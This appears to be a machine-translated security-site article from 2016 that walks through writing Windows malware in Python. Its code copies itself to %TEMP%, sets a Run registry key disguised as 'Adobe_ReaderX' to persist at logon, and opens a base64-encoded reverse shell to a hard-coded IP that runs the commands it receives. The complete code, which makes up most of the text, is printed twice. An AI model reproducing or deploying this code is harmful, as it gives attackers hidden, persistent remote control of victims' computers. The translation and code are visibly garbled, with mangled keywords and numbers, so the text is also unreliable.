Technology share: how to use Python and PyInstaller to write a Windows malicious code-vulnerability warning-the black bar safety net

2016-03-09T00:00:00
ID MYHACK58:62201672391
Type myhack58
Reporter 佚名
Modified 2016-03-09T00:00:00

Description

Disclaimer: This article is intended to share, not for malicious use! This article mainly shows is through the use of python and PyInstaller to build the malicious software of some poc. ! Known to all, malicious software and more will continued to target of the attack. And this is on windows there are many ways you can achieve, the most common approach is to modify the following registry key:“Software\Microsoft\Windows\CurrentVersion\Run”。 The following is to use python to copy the program to the%TEMP%directory, then the registry be modified so that this code can be in the user log on the computer when executed. import sys, base64, os, socket, subprocess from _winreg import * def autorun(tempdir, fileName, run):

Copy the executable to %TEMP%:

os. system('copy %s %s'%(fileName, tempdir))

Queries the Windows registry for key values

Appends the autorun key to runkey array

key = OpenKey(HKEY_LOCAL_MACHINE, run) runkey =[] try: i = 0 while True: subkey = EnumValue(key, i) runkey. append(subkey[0]) i += 1 except WindowsError: pass

Set autorun key:

if 'Adobe ReaderX' not in runkey: try: key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS) SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe") key. Close() except WindowsError: pass In put the code to the %TEMP%directory and set persistent, we can perform the next part of the code, the reverse of the shell. Here I use the TrustedSec released a python reverse shell, but made some modifications—the network traffic is Base64 encoded. def shell():#Base64-encoded reverse shell s = socket. socket(socket. AF_INET, socket. SOCK_STREAM) s. connect(('192.168.56.1', int(4 4 3))) s. send('[] Connection Established!') while 1: data = s. recv(1 0 2 4) if data == "quit": break proc = subprocess. Popen(data, shell=True, stdout=subprocess. PIPE, stderr=subprocess. PIPE, stdin=subprocess. PIPE) stdout_value = proc. stdout. read() + proc. stderr. read() encoded = base64. b64encode(stdout_value) s. send(encoded) #s. send(stdout_value) s. close()def main(): tempdir = '%TEMP%' fileName = sys. argv[0] run = "Software\Microsoft\Windows\CurrentVersion\Run" autorun(tempdir, fileName, run) shell()if name == "main": main() Now when this program is executed, it will open a reverse shell back to“attack”. In this case the“attacker”is just a script hard-coded ip, but in one domain or the Amazon cloud is very simple and easy. The following figure shows the program in Windows executing on the host and connect to the attacker, you can note here the network traffic is base64 encoded: ! The following is the complete code: import sys, base64, os, socket, subprocessfrom _winreg import def autorun(tempdir, fileName, run):# Copy executable to %TEMP%: os. system('copy %s %s'%(fileName, tempdir))# Queries the Windows registry for the autorun key value# Stores the key values in runkey array key = OpenKey(HKEY_LOCAL_MACHINE, run) runkey =[] try: i = 0 while True: subkey = EnumValue(key, i) runkey. append(subkey[0]) i += 1 except WindowsError: pass# If the autorun key "Adobe ReaderX" isn't set this will set the key: if 'Adobe ReaderX' not in runkey: try: key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS) SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe") key. The Close() except WindowsError: passdef the shell():#Base64-encoded reverse shell s = socket. socket(socket. AF_INET, socket. SOCK_STREAM) s. connect(('192.168.56.1', int(4 4 3))) s. send('[*] Connection Established!') while 1: data = s. recv(1 0 2 4) if data == "quit": break proc = subprocess. Popen(data, shell=True, stdout=subprocess. PIPE, stderr=subprocess. PIPE, stdin=subprocess. PIPE) stdout_value = proc. stdout. read() + proc. stderr. read() encoded = base64. b64encode(stdout_value) s. send(encoded) #s. send(stdout_value) s. close()def main(): tempdir = '%TEMP%' fileName = sys. argv[0] run = "Software\Microsoft\Windows\CurrentVersion\Run" autorun(tempdir, fileName, run) shell()if name == "main": main()